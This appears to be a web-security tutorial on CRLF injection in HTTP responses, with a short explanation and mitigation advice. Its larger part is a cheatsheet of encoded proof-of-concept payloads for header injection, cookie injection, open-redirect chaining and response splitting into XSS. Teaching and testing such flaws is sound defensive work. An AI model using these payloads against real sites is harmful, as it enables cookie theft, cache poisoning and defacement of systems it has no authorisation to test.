CRLF Injection defines as CR (Carriage Return) and LF (Line Feed).
CRLF Injection is a one of types of Web injection attacks. By exploiting the CRLF injection flaw in an HTTP response.
They’re used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems.
CRLF Injection Example
In Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
Cyber attackers can modify the application data, compromising integrity and enabling the exploitation of another vulnerabilities such as Cross Site Scripting (XSS), Web Page injection, Web server cache poisoning, Website defacement and more.
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
Also Read: Javascript Injection Impact
How To Fix?
- You should always use a function to encode the CR and LF special characters.
- Strip any newline characters before passing content into the HTTP header.
- Encode the data that you pass into HTTP headers. This will effectively scramble the CR and LF codes if the attacker attempts to inject them.
CRLF Injection Cheatsheet
HTTP Response Splitting
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
Header-based test, site root
%0d%0aheader:header %0aheader:header %0dheader:header %23%0dheader:header %3f%0dheader:header /%250aheader:header /%25250aheader:header /%%0a0aheader:header /%3f%0dheader:header /%23%0dheader:header /%25%30aheader:header /%25%30%61header:header /%u000aheader:header %20%0D%0AHeader-Test:CRLF %23%0D%0AHeader-Test:CRLF \r\nHeader-Test:CRLF \r\n Header-Test:CRLF \r\n Header-Test:CRLF %5cr%5cnHeader-Test:CRLF %E5%98%8A%E5%98%8DHeader-Test:CRLF %E5%98%8A%E5%98%8D%0D%0AHeader-Test:CRLF
CRLF chained with Open Redirect server misconfiguration
Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)
//www.google.com/%2f%2e%2e%0d%0aheader:header /www.google.com/%2e%2e%2f%0d%0aheader:header /google.com/%2F..%0d%0aheader:header
CRLF to XSS
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
Response splitting on 302 Redirect, before Location header (Discovered in DoD)
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)
Note: xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/
Source: Owasp, GitHub